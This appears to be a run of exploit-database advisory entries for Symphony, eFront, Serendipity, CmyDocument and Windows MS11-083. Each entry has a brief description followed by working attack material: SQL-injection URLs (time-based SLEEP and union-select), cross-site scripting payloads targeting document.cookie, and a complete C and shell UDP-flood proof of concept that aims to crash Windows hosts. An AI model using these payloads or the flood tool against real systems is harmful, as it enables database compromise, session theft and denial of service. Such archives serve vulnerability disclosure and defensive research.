Symphony is prone to multiple SQL-injection vulnerabilities and multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Symphony versions prior to 2.2.4 are vulnerable. 

http://example.com/symphony/publish/comments/?filter='+(SELECT+1+FROM+(SELECT+SLEEP(25))A)+'
            
source: https://www.securityfocus.com/bid/50492/info

eFront is prone to multiple cross-site scripting and SQL-injection vulnerabilities because the software fails to sufficiently sanitize user-supplied input.

Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

eFront 3.6.10 build 11944 is vulnerable; other versions may also be affected. 

http://www.example.com/index.php/%27%3E%3Cscript%3Ealert%28document.cookie%29;%3C/script%3E

http://www.example.com/index.php?message=1&message_type=%22%20onmouseover=alert%28document.cookie%29%3E

http://www.example.com/professor.php?ctg=%22%20onmouseover=%22alert%28document.cookie%29

http://www.example.com/student.php?ctg=%22%20onmouseover=%22alert%28document.cookie%29

The following exploit requires the attacker to be registered and logged in:

http://www.example.com/view_test.php?done_test_id=1%20union%20select%201,2,%28select%20version%28%29%29,4,5,6,7,8,9,10,11,12%20--%20

The following exploits require that "magic_quotes_gpc" is off:

http://www.example.com/view_test.php?test_id=1&user=%27SQL_CODE_HERE

http://www.example.com/view_test.php?content_id=2&user=%27SQL_CODE_HERE

http://www.example.com/modules/module_chat/admin.php?force=getLessonFromId&loglessonid=-1%27%20union%20select%20version%28%29%20--%202

http://www.example.com/ask_information.php?common_lessons=1&user1=professor&user2=%27%20union%20select%201,version%28%29%20--%20
            
source: https://www.securityfocus.com/bid/50502/info

Serendipity is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

This issue affects Serendipity 1.5.5; prior versions may also be affected. 

http://www.example.com/serendipity/serendipity_admin_image_selector.php?serendipity[filter][bp.ALT]=</script><script>alert(document.cookie)</script>&go=+-+Go!+-+
            
source: https://www.securityfocus.com/bid/50512/info

CmyDocument is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.

POST http://www.example.com/login.asp
username="><script>alert(&#039;demonalex&#039;)</script>&password=bbb&rememberme=a&submit=+++Login+++

POST http://www.example.com/login2.asp
username="><script>alert(&#039;demonalex&#039;)</script>&password=bbb&rememberme=a&submit=+++Login+++

http://www.example.com/myDoclist.asp?x_Title=a&z_Title=LIKE&x_Revised=<SCRIPT>alert("demonalex");</SCRIPT>&z_Revised==&x_KeyWords=info&z_KeyWords=LIKE&x_owner=a&z_owner=LIKE

http://www.example.com/myWebDoclist.asp?x_Title=b&z_Title=LIKE&x_Revised=<SCRIPT>alert("demonalex");</SCRIPT>&z_Revised==&x_KeyWords=test&z_KeyWords=LIKE&x_owner=a&z_owner=LIKE
            
// source: https://www.securityfocus.com/bid/50517/info

Microsoft Windows is prone to a remote integer-overflow vulnerability that affects the TCP/IP stack.

An attacker can exploit this issue to execute arbitrary code with kernel-level privileges. Successful exploits will completely compromise affected computers. Failed exploit attempts may result in a denial-of-service condition. 

#!/bin/sh
cat >> winnuke2011.c << EOF
/*
* MS11-083 DoS/PoC exploit
* ========================
* This attempts to trigger the ICMP refCount overflow  
* in TCP/IP stack of Win7/Vista/Win2k8 hosts. This 
* requires sending 2^32 UDP packets to a host on a closed
* port, or 4,294,967,296 packets. A dereference function
* must be called that is not triggered via UDP but ICMP  
* echo packets. This exploit creates 250 threads and 
* floods a host with UDP packets and then attempts to
* trigger the de-ref using ping. I calculated that it
* would take approximately 52 days for the host to 
* enter a condition where this vulnerability is 
* triggerable. 
*
* -- prdelka 
*/
#include <stdio.h>
#include <stdlib.h>
#include <pthread.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <stdio.h>
#include <unistd.h>
#include <string.h> 
#include <sys/time.h> 

int port;
int active = 0;
pthread_mutex_t mutexactive;
void *sendpackets(void *ptr);

int main(int argc, char *argv[]) {
       pthread_t thread;
       int iret,lthreads;
  pid_t pid;
  printf("[+] MS11-083 DoS/PoC exploit\n");
  if(argc<3){
    printf("[!] Usage : %s <server> <port>\n", argv[0]);
    exit(1);
  }
  char *const args[] = {"ping",argv[1],NULL};
  char *const envp[] = {"",NULL};
  port = atoi(argv[2]);
  for(lthreads=0;lthreads<250;lthreads++){//UDP flood
    iret = pthread_create(&thread,NULL,sendpackets,argv[1]);
    printf("[-] Thread number %d started\n",lthreads);
    sleep(1);
  }
  printf("[-] One does not simply barrel roll into Mordor\n");
  pid = fork();
  if(pid==0){// trigger deref.
    execve("./ping.sh",args,envp);
  };
  while(active){
  }
  printf("[-] You are finished. Patience is a virtue.\n");
  exit(0);
}

void *sendpackets(void *ptr)
{
  int sd, rc, n, echoLen, flags, error, timeOut;
  unsigned long i;
  struct sockaddr_in remoteServAddr;
  struct hostent *h;
  char str[41];
  pthread_mutex_lock(&mutexactive);
  active++;
  pthread_mutex_unlock(&mutexactive);
     srand(time(NULL));
     for (i = 0;i < 40;++i){
    str[i] = (char)((rand() % 78) + 30);
     }
     str[40] = '\0'; // yes this was off-by-one. :(
  printf("[-] Sending payload '%s'\n",str);
    h = gethostbyname(ptr);
  if(h==NULL) {
        printf("unknown host '%s' \n",(char*)ptr);
        exit(1);
    }
  remoteServAddr.sin_family = h->h_addrtype;
  memcpy((char *) &remoteServAddr.sin_addr.s_addr,h->h_addr_list[0], h->h_length);
  remoteServAddr.sin_port = htons(port);
  sd = socket(AF_INET,SOCK_DGRAM,0);
  if(sd<0){
    printf("[!] Cannot open socket\n");
    pthread_exit((void*)0);
  }
  flags = 0;
  for(i=0;i<4294967295;i++){
    rc = sendto(sd,str,strlen(str)+1,flags,(struct sockaddr *)&remoteServAddr,sizeof(remoteServAddr));
    if(rc<0){
      printf("[!] Cannot send data\n");
            close(sd);
      pthread_exit((void*)0);
        }
  }
  pthread_mutex_lock(&mutexactive);
  active--;
  pthread_mutex_unlock(&mutexactive);
  pthread_exit(NULL);
}
EOF
cat >> ping.sh << EOF
#!/bin/sh
while \`true\`;do /sbin/ping -c 1 \$1;done
EOF
chmod +x ping.sh
gcc winnuke2011.c -o winnuke2011 
./winnuke2011